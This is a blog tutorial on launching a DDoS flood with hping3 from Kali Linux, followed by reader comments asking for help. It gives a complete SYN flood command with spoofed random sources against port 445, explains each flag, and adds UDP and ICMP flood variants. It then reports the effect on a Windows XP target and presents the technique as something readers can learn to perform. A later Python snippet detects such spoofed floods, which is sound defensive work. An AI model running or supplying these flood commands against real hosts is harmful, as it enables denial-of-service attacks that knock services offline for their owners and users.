Tuesday, 01 April 2014

DDoS attack using hping Command in Kali Linux

First of all, what is the hping command in Linux? hping is a command-line oriented TCP/IP packet assembler/analyzer. It has many uses in the world of IT security.

Uses of hping:
  • Firewall Testing
  • Advanced Port Scanning
  • Network testing using different protocols
  • Manual Path MTU discovery
  • Advanced traceroute
  • Remote OS fingerprinting
  • Remote uptime guessing
  • TCP/IP stack auditing

In this case, I will show how hping is used to perform a DDoS attack. Please note that in this example I use hping3, and all the commands are executed in a VM attacking another VM. The main command for using hping for DDoS is:

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source (Victim IP)

-V : verbose mode, an option that provides additional details as to what the computer is doing and what drivers and software it is loading

-c : packet count (in this case the packet count is 1000000)

-d : data size, in this case the data size is 120

-S : set SYN flag

-w : window size, in this case the window size is 64

-p : port, in this case the destination port is 445

-s : base source port, in this case the source port displayed will be port 445

--flood : flood mode, send packets as fast as possible and will not show replies

--rand-source : random source address mode (spoofing)

Preview :

This is the hping DDoS attack in action. In this screenshot you can see I made many mistakes typing the first 5 commands, but this is a learning process, so mistakes will only make you better.

As you can see, the processing load on the target OS (Windows XP SP3) reaches 100%, which gives the victim a very heavy workload (slow PC, lagging).

This is the Wireshark preview on the target OS:

As you can see in the Wireshark log, there is a massive number of connections to (victim IP) from many sources, targeting port 445 of the target. In this case, the sources are randomised by hping (using the --rand-source option). The default protocol while using hping DDoS is the NBNS protocol.

However, hping can also use other protocols for the attack, such as:

UDP : hping3 --flood --rand-source --udp -p 445 (Victim IP)    <-- selected by the --udp option

ICMP : hping3 --flood --rand-source --icmp -p 445 (Victim IP)   <-- selected by the --icmp option
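Seen from the target's side, the pattern in the Wireshark capture described above (a very high packet rate toward one port, with almost every packet coming from a different source) can be detected automatically. The following Python sliding-window detector is an added example, not part of the original post; the record fields, thresholds and sample addresses are assumptions, and it goes beyond the SYN case by counting UDP and ICMP per target in the same way.

```python
import ipaddress
import random
from collections import Counter, defaultdict, deque

WINDOW = 1.0         # seconds per sliding window (assumed threshold)
MIN_PACKETS = 200    # packets in a window before a target is evaluated (assumed)
MIN_SRC_RATIO = 0.9  # distinct sources / packets; near 1.0 suggests spoofed sources

def counts_toward_rate(pkt):
    """Bare TCP SYN (no ACK), or any UDP/ICMP datagram."""
    if pkt["proto"] == "tcp":
        return pkt["flags"] == "S"
    return pkt["proto"] in ("udp", "icmp")

def detect_floods(packets):
    """Return {(dst, proto, dport): peak packets per window}; input sorted by 'ts'."""
    window = defaultdict(deque)     # key -> (ts, src) pairs still inside the window
    sources = defaultdict(Counter)  # key -> packets per source inside the window
    alerts = {}
    for pkt in packets:
        if not counts_toward_rate(pkt):
            continue
        key = (pkt["dst"], pkt["proto"], pkt["dport"])
        win, srcs = window[key], sources[key]
        win.append((pkt["ts"], pkt["src"]))
        srcs[pkt["src"]] += 1
        while pkt["ts"] - win[0][0] > WINDOW:   # expire packets older than WINDOW
            _, old = win.popleft()
            srcs[old] -= 1
            if srcs[old] == 0:
                del srcs[old]
        if len(win) >= MIN_PACKETS and len(srcs) / len(win) >= MIN_SRC_RATIO:
            alerts[key] = max(alerts.get(key, 0), len(win))
    return alerts

def rec(ts, src, dst, dport, flags, proto="tcp"):
    return {"ts": ts, "src": src, "dst": dst, "proto": proto,
            "dport": dport, "flags": flags}

def build_sample():
    """Constructed records: one spoofed SYN flood and two flows that must not match."""
    rng = random.Random(7)
    pkts = [rec(i / 1000, str(ipaddress.IPv4Address(rng.getrandbits(32))),
                "192.0.2.10", 445, "S") for i in range(1000)]      # random sources
    pkts += [rec(i / 300, f"198.51.100.{1 + i % 20}", "192.0.2.20", 443,
                 "S" if i % 15 == 0 else "A") for i in range(300)]  # normal sessions
    pkts += [rec(i / 250, "203.0.113.5", "192.0.2.30", 445, "S")
             for i in range(250)]                                   # one host retrying
    return sorted(pkts, key=lambda p: p["ts"])
```

Calling `detect_floods(build_sample())` flags only the port 445 target that receives SYNs from randomised sources; the single host retrying at a high rate is left for an ordinary per-source rate limit.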

That's all for this week. I hope this will help all of you out there who want to learn how to use hping to perform a DDoS attack.

5 comments:

  1. I still don't get it. Any chance I could get help through Skype?

  2. I tried every method on my own PC, I even tried them all at once, but nothing, so could I get guided through Skype?

  3. Can I send a specific UDP packet (not random data)?

  4. Thanks for this helpful information. I agree with all points you have given to us. Please visit once at